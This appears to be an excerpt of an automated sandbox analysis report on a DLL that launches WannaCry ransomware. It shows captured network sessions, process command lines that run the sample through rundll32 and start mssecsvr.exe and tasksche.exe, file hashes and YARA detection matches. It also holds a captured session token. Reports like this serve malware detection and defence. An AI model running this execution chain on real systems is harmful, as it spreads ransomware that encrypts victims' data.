                                                                                            Date: Thu, 22 Dec 2022 09:04:17 GMT
                                                                                            Connection: close
                                                                                            X-CID: 2


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            1192.168.2.34972123.211.4.90443C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            2022-12-22 09:04:17 UTC0OUTGET /fs/windows/config.json HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Accept: */*
                                                                                            Accept-Encoding: identity
                                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                            Range: bytes=0-2147483646
                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                            Host: fs.microsoft.com
                                                                                            2022-12-22 09:04:17 UTC0INHTTP/1.1 200 OK
                                                                                            Content-Type: application/octet-stream
                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                            ApiVersion: Distribute 1.1
                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                            X-Azure-Ref: 0WjMqYwAAAABjF7l0wOIgQK+R1dOMvnGMTE9OMjFFREdFMTgxNABjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                            Cache-Control: public, max-age=164788
                                                                                            Date: Thu, 22 Dec 2022 09:04:17 GMT
                                                                                            Content-Length: 55
                                                                                            Connection: close
                                                                                            X-CID: 2
                                                                                            2022-12-22 09:04:17 UTC1INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            2192.168.2.349861204.79.197.200443C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            2022-12-22 09:04:30 UTC1OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                            Origin: https://www.bing.com
                                                                                            Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                            Content-type: text/xml
                                                                                            X-MSEdge-ExternalExpType: JointCoord
                                                                                            X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
                                                                                            X-PositionerType: Desktop
                                                                                            X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                                                                            X-Search-SafeSearch: Moderate
                                                                                            X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                                                                            X-UserAgeClass: Unknown
                                                                                            X-BM-Market: US
                                                                                            X-BM-DateFormat: M/d/yyyy
                                                                                            X-CortanaAccessAboveLock: false
                                                                                            X-Device-OSSKU: 48
                                                                                            X-BM-DTZ: -420
                                                                                            X-BM-FirstEnabledTime: 132061295966656129
                                                                                            X-DeviceID: 0100748C09004E33
                                                                                            X-BM-DeviceScale: 100
                                                                                            X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                                                                            X-BM-Theme: 000000;0078d7
                                                                                            X-BM-DeviceDimensionsLogical: 1232x1024
                                                                                            X-BM-DeviceDimensions: 1232x1024
                                                                                            X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3D
                                                                                            X-Agent-DeviceId: 0100748C09004E33
                                                                                            X-BM-CBT: 1660685844
                                                                                            X-Device-isOptin: true
                                                                                            X-Device-Touch: false
                                                                                            X-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018
                                                                                            X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                            X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                            Host: www.bing.com
                                                                                            Content-Length: 87284
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1671732236826&AC=1&CPH=4ef661f2
                                                                                            2022-12-22 09:04:30 UTC4OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 31 34 44 35 41 36 39 41 42 45 46 46 36 39 36 32 30 31 34 35 41 44 30 35 42 46 43 37 36 38 35 38 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 62 38 39 65 62 65 32 38 63 66 65 39 34 31 35 66 38 61 64 65 33 38 62 63 66 66 64 35 32 65 38 61 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65
                                                                                            Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.ClientInst</T><IG>b89ebe28cfe9415f8ade38bcffd52e8a</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,Ambie
                                                                                            2022-12-22 09:04:30 UTC20OUTData Raw: 54 53 3e 3c 2f 45 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 49 51 75 65 75 65 45 72 72 6f 72 3c 2f 54 3e 3c 49 47 3e 37 33 38 35 64 65 38 36 32 35 66 62 34 33 31 30 62 37 30 35 39 37 30 62 32 38 64 35 35 38 62 33 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 6e 74 57 69 64 65 73 63 72 65 65 6e 2c 72 73 31 6d 75 73 69 63 70 72 6f 64 2c 43 6f 72 74 61 6e 61 53 50 41 58 61 6d 6c 48 65 61 64 65 72 22 2c 22 65 72 72 6f 72 54 79 70 65 22 3a 22
                                                                                            Data Ascii: TS></E><E><T>Event.CIQueueError</T><IG>7385de8625fb4310b705970b28d558b3</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","errorType":"
                                                                                            2022-12-22 09:04:30 UTC36OUTData Raw: 40 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2b 63 73 2f 72 2f 2f 40 30 2f 6d 61 6e 69 66 65 73 74 25 32 46 74 68 72 65 73 68 6f 6c 64 2e 61 70 70 63 61 63 68 65 2f 6f 74 68 65 72 2f 30 2f 40 31 2f 63 73 2f 2d 31 2f 63 73 2f 2d 31 2f 2d 31 2f 2d 31 2b 63 7a 2f 73 2f 2f 40 30 2f 46 72 61 6d 65 77 6f 72 6b 2f 40 33 2f 30 2f 40 31 2f 63 7a 2f 2d 31 2f 63 7a 2f 64 30 2f 64 30 2f 64 30 2b 65 31 2f 74 2f 2f 40 30 2f 74 68 72 65 73 68 6f 6c 64 25 32 46 78 6c 73 2e 61 73 70 78 2f 78 6d 6c 68 74 74 70 72 65 71 75 65 73 74 2f 30 2f 40 31 2f 65 31 2f 2d 31 2f 65 31 2f 2d 31 2f 2d 31 2f 2d 31 2b 65 74 2f 75 2f 2f 40 30 2f 56 32 25 32 46 32 2c 53 57 56 53 2f 2f 30 2f 40 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2b 65 74 2f 76 2f 2f 40 30
                                                                                            Data Ascii: @1/-1/-1/-1/-1/-1/-1+cs/r//@0/manifest%2Fthreshold.appcache/other/0/@1/cs/-1/cs/-1/-1/-1+cz/s//@0/Framework/@3/0/@1/cz/-1/cz/d0/d0/d0+e1/t//@0/threshold%2Fxls.aspx/xmlhttprequest/0/@1/e1/-1/e1/-1/-1/-1+et/u//@0/V2%2F2,SWVS//0/@1/-1/-1/-1/-1/-1/-1+et/v//@0
                                                                                            2022-12-22 09:04:30 UTC52OUTData Raw: 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 6e 74 57 69 64 65 73 63 72 65 65 6e 2c 72 73 31 6d 75 73 69 63 70 72 6f 64 2c 43 6f 72 74 61 6e 61 53 50 41 58 61 6d 6c 48 65 61 64 65 72 22 2c 22 45 6e 72 69 63 68 65 64 43 6c 69 65 6e 74 49 6e 66 6f 22 3a 7b 22 4d 55 49 44 22 3a 22 31 45 31 37 42 39 42 37 30 45 39 42 34 43 36 45 39 35 37 44 31 35 39 45 44 33 36 34 36 46 46 46 22 2c 22 41 43 56 65 72 22 3a 22 34 65 66 36 36 31 66 32 22 2c 22 46 44 50 61 72 74 6e 65 72 45 6e 74 72 79 22 3a 22 61 75 74 6f 73 75 67 67 65 73 74 22 2c 22 69 73 4f 66 66 6c 69 6e 65 22 3a 30 2c 22 77 65 62 52 65 71 75 65 73 74 65 64 22 3a 31 2c 22 65 6e 74 72 79 50 6f 69 6e 74 22 3a 22 57 4e 53 53 54
                                                                                            Data Ascii: it","Pivot":"QF","CF":"pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","EnrichedClientInfo":{"MUID":"1E17B9B70E9B4C6E957D159ED3646FFF","ACVer":"4ef661f2","FDPartnerEntry":"autosuggest","isOffline":0,"webRequested":1,"entryPoint":"WNSST
                                                                                            2022-12-22 09:04:30 UTC67OUTData Raw: 76 72 3e 3c 2f 4d 3e 3c 2f 47 72 6f 75 70 3e 3c 47 72 6f 75 70 3e 3c 4d 3e 3c 49 47 3e 65 62 33 65 30 38 30 39 32 37 62 63 34 36 65 32 39 37 32 36 34 31 34 34 37 34 35 36 30 35 61 64 3c 2f 49 47 3e 3c 44 53 3e 3c 21 5b 43 44 41 54 41 5b 5b 7b 22 54 22 3a 22 44 2e 41 67 67 72 65 67 61 74 6f 72 22 2c 22 53 65 72 76 69 63 65 22 3a 22 41 75 74 6f 53 75 67 67 65 73 74 22 2c 22 53 63 65 6e 61 72 69 6f 22 3a 22 41 67 67 72 65 67 61 74 6f 72 22 2c 22 41 70 70 4e 53 22 3a 22 53 6d 61 72 74 53 65 61 72 63 68 22 2c 22 44 53 22 3a 5b 5d 2c 22 72 61 6e 6b 65 72 4d 6f 64 65 6c 49 64 73 22 3a 7b 22 66 61 73 74 52 61 6e 6b 4d 6f 64 65 6c 49 64 22 3a 22 53 54 48 5f 38 64 30 36 66 38 33 63 2d 64 61 35 38 2d 34 63 30 32 2d 38 66 65 38 2d 62 61 32 63 30 34 39 64 39 38 30 39
                                                                                            Data Ascii: vr></M></Group><Group><M><IG>eb3e080927bc46e297264144745605ad</IG><DS><![CDATA[[{"T":"D.Aggregator","Service":"AutoSuggest","Scenario":"Aggregator","AppNS":"SmartSearch","DS":[],"rankerModelIds":{"fastRankModelId":"STH_8d06f83c-da58-4c02-8fe8-ba2c049d9809
                                                                                            2022-12-22 09:04:30 UTC83OUTData Raw: 63 70 3d 37 26 63 76 69 64 3d 33 31 32 33 65 66 35 63 30 38 35 65 34 65 37 33 39 31 30 63 36 38 33 32 36 30 31 32 38 31 38 32 26 69 67 3d 36 34 38 62 65 35 66 33 32 32 64 31 34 35 37 34 38 36 61 30 35 38 39 62 37 36 30 63 61 37 38 36 26 41 53 49 6e 69 74 49 47 3d 43 30 34 30 39 45 38 34 43 37 45 43 34 44 31 36 41 32 43 44 44 41 34 38 30 35 45 32 44 33 43 34 22 2c 22 52 65 73 6f 75 72 63 65 73 56 65 72 73 69 6f 6e 22 3a 22 38 5f 30 31 5f 30 5f 30 30 30 30 30 30 22 7d 2c 22 54 53 22 3a 31 35 39 35 35 32 34 36 38 33 33 38 35 2c 22 55 54 53 22 3a 31 36 37 31 37 33 32 32 36 39 30 31 36 2c 22 55 78 43 6c 61 73 73 69 66 69 63 61 74 69 6f 6e 22 3a 7b 22 63 6c 69 65 6e 74 22 3a 22 77 69 6e 64 6f 77 73 22 7d 2c 22 43 6f 6f 6b 69 65 73 22 3a 7b 22 4d 55 49 44 22 3a
                                                                                            Data Ascii: cp=7&cvid=3123ef5c085e4e73910c683260128182&ig=648be5f322d1457486a0589b760ca786&ASInitIG=C0409E84C7EC4D16A2CDDA4805E2D3C4","ResourcesVersion":"8_01_0_000000"},"TS":1595524683385,"UTS":1671732269016,"UxClassification":{"client":"windows"},"Cookies":{"MUID":
                                                                                            2022-12-22 09:04:30 UTC89INHTTP/1.1 204 No Content
                                                                                            Access-Control-Allow-Origin: *
                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            X-MSEdge-Ref: Ref A: 54DCC4A419FF46369FB13D6C0A5BD463 Ref B: FRA31EDGE0515 Ref C: 2022-12-22T09:04:30Z
                                                                                            Date: Thu, 22 Dec 2022 09:04:30 GMT
                                                                                            Connection: close


                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:10:04:10
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\System32\loaddll32.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:loaddll32.exe "C:\Users\user\Desktop\xIwkOnjSIa.dll"
                                                                                            Imagebase:0x8b0000
                                                                                            File size:116736 bytes
                                                                                            MD5 hash:1F562FBF37040EC6C43C8D5EF619EA39
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate

                                                                                            Target ID:1
                                                                                            Start time:10:04:10
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff745070000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            Target ID:2
                                                                                            Start time:10:04:10
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xIwkOnjSIa.dll",#1
                                                                                            Imagebase:0xb0000
                                                                                            File size:232960 bytes
                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            Target ID:3
                                                                                            Start time:10:04:10
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:rundll32.exe C:\Users\user\Desktop\xIwkOnjSIa.dll,PlayGame
                                                                                            Imagebase:0xae0000
                                                                                            File size:61952 bytes
                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            Target ID:4
                                                                                            Start time:10:04:10
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\xIwkOnjSIa.dll",#1
                                                                                            Imagebase:0xae0000
                                                                                            File size:61952 bytes
                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            Target ID:5
                                                                                            Start time:10:04:11
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\mssecsvr.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\WINDOWS\mssecsvr.exe
                                                                                            Imagebase:0x400000
                                                                                            File size:2281472 bytes
                                                                                            MD5 hash:06F05FA7206B546118253C33D60541DC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000000.244617734.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000000.245185564.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000000.245687308.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000000.246578066.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000002.254798373.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                            • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvr.exe, Author: Florian Roth (with the help of binar.ly)
                                                                                            • Rule: WannaCry_Ransomware_Gen, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvr.exe, Author: Florian Roth (based on rule by US CERT)
                                                                                            • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\mssecsvr.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 98%, ReversingLabs
                                                                                            Reputation:low

                                                                                            Target ID:6
                                                                                            Start time:10:04:13
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\xIwkOnjSIa.dll",PlayGame
                                                                                            Imagebase:0xae0000
                                                                                            File size:61952 bytes
                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            Target ID:7
                                                                                            Start time:10:04:13
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\mssecsvr.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\WINDOWS\mssecsvr.exe -m security
                                                                                            Imagebase:0x400000
                                                                                            File size:2281472 bytes
                                                                                            MD5 hash:06F05FA7206B546118253C33D60541DC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000007.00000000.250229077.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000007.00000002.764989096.000000000042E000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000007.00000002.770314076.00000000024E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000007.00000002.768457248.0000000001FBA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low

                                                                                            Target ID:8
                                                                                            Start time:10:04:13
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\mssecsvr.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\WINDOWS\mssecsvr.exe
                                                                                            Imagebase:0x400000
                                                                                            File size:2281472 bytes
                                                                                            MD5 hash:06F05FA7206B546118253C33D60541DC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000000.251873515.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000000.252574980.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000000.250670381.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000002.259883284.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000000.254187170.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security

                                                                                            Target ID:9
                                                                                            Start time:10:04:15
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\tasksche.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\WINDOWS\tasksche.exe /i
                                                                                            Imagebase:0x400000
                                                                                            File size:2061938 bytes
                                                                                            MD5 hash:06773C385B9F9A55B70067ED1D5739DE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 90%, ReversingLabs

                                                                                            Target ID:10
                                                                                            Start time:10:04:17
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\tasksche.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\WINDOWS\tasksche.exe /i
                                                                                            Imagebase:0x400000
                                                                                            File size:2061938 bytes
                                                                                            MD5 hash:06773C385B9F9A55B70067ED1D5739DE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            Target ID:11
                                                                                            Start time:10:04:28
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            Target ID:12
                                                                                            Start time:10:04:28
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language

                                                                                            Target ID:13
                                                                                            Start time:10:04:32
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language

                                                                                            Target ID:14
                                                                                            Start time:10:04:33
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language

                                                                                            Target ID:15
                                                                                            Start time:10:04:33
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language

                                                                                            Target ID:16
                                                                                            Start time:10:04:33
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\System32\SgrmBroker.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                            Imagebase:0x7ff61a5b0000
                                                                                            File size:163336 bytes
                                                                                            MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            Target ID:17
                                                                                            Start time:10:04:34
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k netsvcs -p
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            Target ID:18
                                                                                            Start time:10:04:34
